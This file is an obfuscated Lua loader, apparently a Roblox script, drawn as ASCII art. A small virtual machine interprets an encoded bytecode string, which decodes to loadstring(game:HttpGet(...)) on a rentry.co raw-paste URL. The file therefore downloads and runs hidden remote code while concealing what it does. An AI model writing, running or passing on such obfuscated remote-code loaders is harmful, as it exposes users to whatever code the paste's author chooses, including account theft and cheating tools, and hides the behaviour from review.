                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16) 
                                                  );if v19 then local v101=v5(v85,v19);v19=nil;return v101;else return v85;end break;end end end    
                                                  end);local function v20(v31,v32,v33) if v33 then local v86=0 -0 ;local v87;while true do if (v86==( 
                                                0 -0)) then v87=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-((1809 -(282 + 595)) -(  
                                                857 + 74)))) + 1)) ;return v87-(v87%(569 -(367 + 201))) ;end end else local v88=2^(v32-(928 -((1851 -(    
                                              1523 + 114)) + 641 + 72))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end local function  
                                              v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;   
                                            local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * ((2483 -(892 + 65)) -(226 + 1044))) + v36 
                                             ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;v35=(2 -1) + 0 ;end end    
                                          end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(0 -0)) then v39,   
                                          v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (7 -3) ;v38=351 -(87 + (1045 -782)) ;end if (v38==(2 -1)) then return (v42 
                                           * (12338840 + 4438376)) + (v41 * (65716 -(67 + 113))) + (v40 * 256) + v39 ;end end end local function v24() local v43=v23( 
                                          );local v44=v23();local v45=953 -(802 + 150) ;local v46=(v20(v44,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v43 ;     
                                        local v47=v20(v44,(501 -(416 + 26)) -38 ,19 + 12 );local v48=((v20(v44,102 -70 )==(1 + 0)) and  -(1 -0)) or 1 ;if (v47==0) then 
                                         if (v46==0) then return v48 * (1187 -(1069 + 118)) ;else v47=2 -1 ;  --[[==============================]]v45=0 -0 ;end elseif (  
                                        v47==(356 + (2991 -1300))) then return ((v46==(0 -0)) and ( --[[============================================]]v48 * (((439 -(145  
                                        + 293)) + 0)/((1221 -(44 + 386)) -((1854 -(998 + 488))  --[[======================================================]]+ 423))))) or ( 
                                      v48 * NaN) ;end return v8(v48,v47-(3214 -(697 + 1494) --[[==========================================================]]) ) * (v45 + (v46 
                                      /((20 -(10 + 8))^((163 + 36) -147)))) ;end local    --[[==============================================================]]function v25(   
                                      v49) local v50;if  not v49 then local v89=772 -(201 --[[================================================================]] + 571) ;while  
                                      true do if (v89==(1138 -(116 + 1022))) then v49=v23 --[[==================================================================]]();if (v49==( 
                                      0 -0)) then return "";end break;end end end v50=v3( --[[==================================================================]]v16,v18,(v18 +    
                                    v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=( --[[====================================================================]]10 -7) -2 , # 
                    v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local  --[[====================================================================]]v26=v23;local   
              function v27(...) return {...},v12("#",...);end local function v28() local  --[[======================================================================]]v52=0 -0 ;    
            local v53;local v54;local v55;local v56;local v57;local v58;local v59;local   --[[======================================================================]]v60;while     
          true do if (1~=v52) then else v55=nil;v56=nil;v52=282 -(99 + 181) ;end if (v52  --[[======================================================================]]~=(1 + 1))    
        then else v57=nil;v58=nil;v52=609 -(454 + 152) ;end if (4==v52) then while true   --[[======================================================================]]do if (v53==3 
        ) then v60=nil;while true do local v102=0 -0 ;local v103;local v104;while true do --[[======================================================================]] if (v102~=(  
      1288 -(993 + 295))) then else v103=0 + 0 ;v104=nil;v102=1;end if (v102==(1172 -(418 --[[======================================================================]] + 753)))     
      then while true do if (v103==0) then v104=0 + 0 ;while true do if (v104==1) then if ( --[[==================================================================]]1==v54) then    
      local v144=0 + 0 ;local v145;while true do if (v144==0) then v145=0 + 0 ;while true   --[[================================================================]]do if (v145~=(0 + 
     0)) then else local v150=529 -(406 + 123) ;local v151;while true do if (v150==0) then  --[[==============================================================]]v151=1769 -(1749  
    + 20) ;while true do if (v151~=1) then else v145=1;break;end if (v151~=0) then else v59=  --[[==========================================================]]v23();v60={};v151=1 
    ;end end break;end end end if (1~=v145) then else for v153=1 + 0 ,v59 do local v154=1322 -( --[[====================================================]]1249 + 73) ;local v155; 
    local v156;local v157;while true do if (v154==0) then v155=0 + 0 ;v156=nil;v154=1146 -(466 +  --[[==============================================]]679) ;end if (v154==(2 -1 
    )) then v157=nil;while true do if (v155==(2 -1)) then if (v156==1) then v157=v21()~=(1900 -(106 + --[[====================================]] 1794)) ;elseif (v156==2)     
    then v157=v24();elseif (v156==(1 + 2)) then v157=v25();end v60[v153]=v157;break;end if (v155==0) then --[[========================]] local v163=0;local v164;while true   
    do if (v163==(0 + 0)) then v164=0 -0 ;while true do if ((2 -1)==v164) then v155=115 -(4 + 110) ;break;end if (v164~=(584 -(57 + 527))) then else local v168=1427 -(41 + 
   1386) ;while true do if (v168==(103 -(17 + 86))) then v156=v21();v157=nil;v168=1;end if (v168~=1) then else v164=1 + 0 ;break;end end end end break;end end end end    
  break;end end end v58[6 -3 ]=v21();v145=5 -3 ;end if (v145==(168 -(122 + 44))) then v54=2 -0 ;break;end end break;end end end break;end if (v104==(0 -0)) then local  
  v143=0;while true do if (v143==(0 + 0)) then if (v54==2) then local v146=0 + 0 ;local v147;while true do if ((0 -0)~=v146) then else v147=65 -(30 + 35) ;while true do  
  local v158=0 + 0 ;local v159;while true do if (v158==0) then v159=0;while true do if ((1257 -(1043 + 214))==v159) then if (v147==0) then local v165=0;local v166;while  
  true do if (v165~=(0 -0)) then else v166=0;while true do if (v166==(1213 -(323 + 889))) then v147=1;break;end if (v166==(0 -0)) then local v169=580 -(361 + 219) ;while 
   true do if (1==v169) then v166=321 -(53 + 267) ;break;end if (v169==(0 + 0)) then for v170=414 -(15 + 398) ,v23() do local v171=0;local v172;local v173;while true do  
  if (v171==(983 -(18 + 964))) then while true do if ((0 -0)~=v172) then else v173=v21();if (v20(v173,1 + 0 ,1 + 0 )~=0) then else local v176=850 -(20 + 830) ;local v177 
  ;local v178;local v179;local v180;local v181;while true do if (v176==2) then v181=nil;while true do if (v177~=1) then else local v182=0 + 0 ;while true do if (v182==(  
  127 -(116 + 10))) then v177=2;break;end if (v182==(0 + 0)) then v180=nil;v181=nil;v182=1;end end end if (v177~=2) then else while true do if (v178==2) then local v184= 
  738 -(542 + 196) ;local v185;while true do if (v184~=0) then else v185=0 -0 ;while true do if (v185==(1 + 0)) then v178=3;break;end if (v185==0) then local v192=0 + 0  
  ;while true do if (v192==1) then v185=1;break;end if (v192==0) then if (v20(v180,1,1 + 0 )~=1) then else v181[2]=v60[v181[4 -2 ]];end if (v20(v180,2,4 -2 )~=(1552 -(   
  1126 + 425))) then else v181[3]=v60[v181[3]];end v192=1;end end end end break;end end end if (3==v178) then if (v20(v180,3,408 -(118 + 287) )==1) then v181[15 -11 ]=v60[ 
  v181[1125 -(118 + 1003) ]];end v55[v170]=v181;break;end if (v178==0) then v179=v20(v173,2,8 -5 );v180=v20(v173,381 -(142 + 235) ,6);v178=1;end if (v178~=1) then else     
  local v187=0;while true do if (v187==(4 -3)) then v178=2;break;end if (0==v187) then v181={v22(),v22(),nil,nil};if (v179==0) then local v190=0 + 0 ;local v191;while true 
   do if (v190~=(0 + 0)) then else v191=0;while true do if (v191==(0 + 0)) then v181[2 + 1 ]=v22();v181[3 + 1 ]=v22();break;end end break;end end elseif (v179==(2 -1))     
  then v181[7 -4 ]=v23();elseif (v179==2) then v181[6 -3 ]=v23() -(2^(5 + 11)) ;elseif (v179==(14 -11)) then local v201=753 -(239 + 514) ;local v202;local v203;local v204; 
  while true do if (0==v201) then v202=0;v203=nil;v201=1 + 0 ;end if (v201==1) then v204=nil;while true do if (v202~=1) then else while true do if (v203~=0) then else v204 
  =0;while true do if ((1329 -(797 + 532))==v204) then v181[3]=v23() -(2^16) ;v181[3 + 1 ]=v22();break;end end break;end end break;end if (v202==(0 + 0)) then v203=0 -0 ;  
  v204=nil;v202=1203 -(373 + 829) ;end end break;end end end v187=732 -(476 + 255) ;end end end end break;end if (v177==(1130 -(369 + 761))) then local v183=0;while true   
  do if (v183~=(1 + 0)) then else v177=1 -0 ;break;end if (v183==0) then v178=0 -0 ;v179=nil;v183=1;end end end end break;end if (v176~=0) then else v177=0;v178=nil;v176=1 
  ;end if ((239 -(64 + 174))~=v176) then else v179=nil;v180=nil;v176=2;end end end break;end end break;end if (v171~=(0 + 0)) then else v172=0 -0 ;v173=nil;v171=1;end end  
  end for v174=337 -(144 + 192) ,v23() do v56[v174-1 ]=v28();end v169=217 -(42 + 174) ;end end end end break;end end end if (v147~=(1 + 0)) then else return v58;end break; 
  end end break;end end end break;end end end if (v54==(0 + 0)) then local v148=0 + 0 ;local v149;while true do if (v148==(1504 -(363 + 1141))) then v149=0;while true do   
  if (v149~=(1581 -(1183 + 397))) then else local v160=0 -0 ;local v161;while true do if ((0 + 0)~=v160) then else v161=0 + 0 ;while true do if (v161~=(1975 -(1913 + 62))) 
   then else local v167=0;while true do if (v167==0) then v57={};v58={v55,v56,nil,v57};v167=1934 -(565 + 1368) ;end if (v167~=1) then else v161=1;break;end end end if (  
  v161==(3 -2)) then v149=1663 -(1477 + 184) ;break;end end break;end end end if (v149==(2 -0)) then v54=1;break;end if (0==v149) then v55={};v56={};v149=1 + 0 ;end end  
  break;end end end v143=1;end if (v143==1) then v104=1;break;end end end end break;end end break;end end end break;end if (v53~=0) then else local v98=856 -(564 + 292)  
    ;while true do if (v98~=(1 -0)) then else v53=1;break;end if (v98==0) then v54=0;v55=nil;v98=2 -1 ;end end end if (v53==(305 -(244 + 60))) then local v99=0 + 0 ;     
    while true do if ((477 -(41 + 435))==v99) then v53=2;break;end if (v99~=(1001 -(938 + 63))) then else v56=nil;v57=nil;v99=1 + 0 ;end end end if (v53==(1127 -(936 +   
    189))) then local v100=0;while true do if (v100==(0 + 0)) then v58=nil;v59=nil;v100=1614 -(1565 + 48) ;end if (v100==(1 + 0)) then v53=3;break;end end end end break; 
    end if (v52==3) then v59=nil;v60=nil;v52=1142 -(782 + 356) ;end if (v52==(267 -(176 + 91))) then v53=0 -0 ;v54=nil;v52=1 -0 ;end end end local function v29(v61,v62,  
      v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;   
      local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v90=0,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + 1 ];else v79[v90]=  
      v76[v90 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v91=0;while true do if (v91==1) then if (v82<=3) then if (v82<=1) then if  
        (v82==0) then do return;end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82==2) then local v106=v81[2];local v107=v79[v81[3]];v79[v106 + 1 ]=v107;v79[v106]=v107[   
        v81[4]];else local v111=v81[2];v79[v111]=v79[v111](v13(v79,v111 + 1 ,v74));end elseif (v82<=5) then if (v82==4) then local v113;local v114,v115;local v116;     
        local v117;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v117=v81[2];v116=v79[v81[3]];v79[v117 + 1 ]=v116 
          ;v79[v117]=v116[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v117=v81[2] 
            ;v114,v115=v72(v79[v117](v13(v79,v117 + 1 ,v81[3])));v74=(v115 + v117) -1 ;v113=0;for v132=v117,v74 do v113=v113 + 1 ;v79[v132]=v114[v113];end v73=v73 +  
              1 ;v81=v69[v73];v117=v81[2];v79[v117]=v79[v117](v13(v79,v117 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end 
                 else local v127=0;local v128;local v129;local v130;local v131;while true do if (0==v127) then v128=v81[2];v129,v130=v72(v79[v128](v13(v79,v128 + 1 , 
                  v81[3])));v127=1;end if (v127==1) then v74=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==2) then for v140=v128,v74 do v131=v131 + 1 ;v79[v140]=   
                      v129[v131];end break;end end end elseif (v82<=6) then v79[v81[2]]();elseif (v82>7) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]=v81[3];end   
                                  v73=v73 + 1 ;break;end if (v91==0) then v81=v69[v73];v82=v81[1];v91=1;end end end end;end return v29(v28(),{},v17)(...);end v15(  
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


--------------------------------------------------------------------------------
"LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F72656E7472792E636F2F39356E396D3638362F72617700093O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
